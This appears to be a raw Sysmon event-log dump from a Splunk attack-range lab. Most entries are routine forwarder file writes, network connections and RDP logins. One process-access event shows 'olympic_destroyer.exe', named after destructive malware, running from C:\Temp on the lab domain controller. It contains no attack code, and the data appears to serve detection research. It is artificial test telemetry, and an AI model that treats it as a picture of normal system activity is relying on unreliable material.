Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0B6DF96AE7DF0BB1798ABB89D4BF764,SHA256=6F708522CC4B29AD54A82B323A59BD386A26AD0AB9829B410A293B074F9AD4B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218907Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:28.800{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF08E89C149B3F4661C3BE2989A2620B,SHA256=426DD32C043F53229174CADA9172879674531599BFB02C5D8A108B35D1FDCEDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294709Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:28.634{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3718FBC1EBE400D764408E342EBA8E7,SHA256=483138C6B6A8BFE2E43FAD32CBEC314007DA418885E1D435444ED81C1E56DE92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218906Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:28.785{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B2EBDB0ED34B1347B4DF2436EE79B28D,SHA256=2AAA4F3CA52C72814CF2FC86921193B1D2E5D3A9C14210247909AB6163C4150E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218905Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:25.987{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx62938-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000218908Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:29.894{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AD56EF8A6B15225AE57BAFEC044ACD3,SHA256=82FCAAAC0B901AA024B3C19DAB6C2D7748676F6815915DABAC0C60B0ED7ADC23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294710Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:29.651{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A91CB830A5EBC880F7615FFCEFE93BD,SHA256=4B091CD510D33B2EF5D9B35E15668AFA556806BCD36C71F791DBE4CB2A2866A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218910Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:30.910{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C87A51CFF5D8FDDCFA89D93B9C7EC58,SHA256=67CFDB509A74C80FC4195035D6211D324919C4F5500A81FD5362AB410606BC35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294712Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:30.682{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA3511DECACC9B5C8549538131EE08E1,SHA256=42088C79FEC677962CC3C99A7E67718CF3479FCEA38E66E51521649E4446368B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218909Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:30.394{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=5E0B3C768A999148FF3155598535EED3,SHA256=4CE864CD51E61C72FA5B1A47BF52D3D099C1FC1E95733E5D1226B604A83E2E8A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294711Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:27.625{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49164-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294713Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:31.697{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90C12F2DC9BD566CBAC13B9165C5CAC9,SHA256=6D0063E080B71E8BE4323B932341F316A0F6C9FBF8E59D792004644A25D34B92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218913Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:31.925{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B9E2737A23C3725B164EC31F62C124B,SHA256=81E9F0468296C6CB178CF85BEB8337FC5A64D71C7CB8C2D98582ABF8C34C6209,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218912Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:31.847{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=208FEF029D2A32F28626FF64E499E5B0,SHA256=E74CBE72F2DD80309EA15BBA36B771396A2F18BFC854A47FEDF39BC39E07B324,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218911Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:28.745{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx58406-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000294715Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:32.932{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=948F36B256204531F89A7AAD74E09467,SHA256=FC914268B9E5890645092AEFE111AFBA571601398008E0747EED61CF17B1781B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294714Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:32.713{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6DB4676B189ADB49FE09D7BB20EF633,SHA256=D575ECA586C08DE2B8B3A0B98F816E27FD511F0FE0C52D254D8CC8FA3038860C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218915Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:32.941{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9386B6D4F340D0E122FD78425CC416D8,SHA256=F072FB0F4327420F2BE32B19C08844B065C246D333CBA375A95A6029E309F5BB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218914Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:29.623{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51490-false10.0.1.12-8000- 23542300x8000000000000000218916Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:33.956{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EBD3EC10FA3555BE5AF6EC2A5836A77,SHA256=606446913254E9D07723AF50D2B9D011CD7FB576289AED5FB3354864D8051CD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294717Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:33.713{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E1AF9B9413BCB6AD6DEB89B1451B3E9,SHA256=A3F3B24A2E77C8584BB05764508B3E45D6A6FA2C08D44181C71198DF3CD32D96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294716Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:33.450{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=F23631C4A659E0080810E21678EBAFC7,SHA256=041FA7ED0B74641527003831C679B8D2913706B5BD6203D5CD7116737E0267CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218919Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:34.972{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8FA7468457FD84C05A1E7D05AC087DC,SHA256=B01E12BCB3C04F014F7F171D737D7AE85ADB73CF009C0AAF94D015CC218361AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294720Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:34.713{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7825994E15176208610121D9CA1B9EE7,SHA256=71992D885FD5244D4374D32B7A5803ABA3615DF18B039F8406D322749CC4E59D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218918Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:34.910{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02BD63143A0AC1A602585EEE7E680444,SHA256=7E95455DC81D8708CE84421A2EEDDD5656A322F0C1D5319A29E022E7B70C291A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218917Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:32.122{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx64296-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 10341000x8000000000000000294719Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:34.451{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000294718Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:34.451{C8EA50B7-146B-6216-9B06-000000003802}1804C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000294722Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:35.733{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72A1264AB4895901E2A3BB2293FDD156,SHA256=86487DEEA1F4C08F36AF886801EB9FFA1772DC89AD0611D7C685D2FFFBE6EA65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218920Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:35.988{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=767FFD7D8CC797FFD366016122B25E76,SHA256=044791AC52D8314AD35F228D1DEBAC5D311CAF16961CB2771357046C5091E070,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294721Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:35.320{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-146MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294725Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:36.749{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9B6C86BE8E620B15C7FC0DB47979898,SHA256=A0CF9913DF592581BAFA0D06CB38B862CCFEE544409A0BE352468D5069A3D00B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294724Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:36.330{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-147MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294723Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:33.540{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49166-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000218921Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:34.639{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51491-false10.0.1.12-8000- 23542300x8000000000000000294726Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:37.780{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8F892D6E63DA5A86A2A24865FA957C0,SHA256=F7160E368A6EE68DB884123036D50CB8F4B87EE9FBB527EF5AFA061B3810E69D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218922Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:37.003{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A7A8D9543FC04FBC2A3EBC7B57CFC65,SHA256=5A0A961CC8CFBC9FD8BB4D9567808AE41F12322A9E6A07A2ADCDB83618F654AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294727Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:38.795{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=280FA58CD8D47CA6A0A93D95B0A718CB,SHA256=9C3775CBE4D1DE2E7F5ED0552C74AFEA8480DD14C2D40EFD099763FE508D9149,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218925Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:38.831{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DE2971B6C7EC1EDE379052E2B59670B5,SHA256=691DF9712ACC7A5B8A52FC84ED14B39B0F36AD16E16C44568E9B9C56D8C7CE32,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218924Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:36.054{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx50097-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000218923Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:38.019{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF2B1B00913A3D856FC1E2C4FD4D1F96,SHA256=948E14DACBC517B2FD91EC4DE9D836AD272C3FE573B0A399808337CFCB7E74A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294728Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:39.811{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=579C253EE5C13001374ED8B0BA609A3F,SHA256=63A8334BE427B106E6AB2C2F0BEDBC32667F06FE05BB13979F92B7629EC1D5AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218926Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:39.128{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11CDB1AFEAB7CF306BEFF38560CFF129,SHA256=ADFE736100438BAC9DA2D05D3C6905B94B21C397009A3DF3661C13F3B1A1BFC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294731Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:40.831{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA92986768308741D7C4E293DAD48F4A,SHA256=811F34A347FC513036F027425E665BCDE17360B98B912BFB1025DD5F6BB4BE5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218927Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:40.144{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E3E2CA7D84B5AFA0812BC50437E8B88,SHA256=BA107CB629BA40039DA0728426701422C8882F497C4165BDD4310D3E181B9C6A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294730Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:38.602{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49168-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294729Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:40.133{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294732Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:41.849{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4DF29CE282E5FC010C070AC3DDD06D0,SHA256=00553593DDA35603EF234109B5D084089EA248AEC55A53DAB9F706B3900C65FF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218929Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:39.181{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx50917-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000218928Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:41.144{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F627CC8D2C552EC5683755183DB0834A,SHA256=B5DADE82B44CDF9FAFBC79142B93910833B9548C97E02969677FFEA41EEDA56A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294734Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:42.864{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F83948E7152F1C503C4E6AF97B76D00,SHA256=9BB5B22566BFDC35E3860BDAAB814E066268884915BA25218BF2962A64D4F4B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218932Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:42.847{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D15E7717AB4C0C681EB41D43D998E1F,SHA256=6344F225A21CEA7E595891A178DCF1D9098D50FA9A759E0641AFEE04325501D4,IMPHASH=00000000000000000000000000000000falsetrue 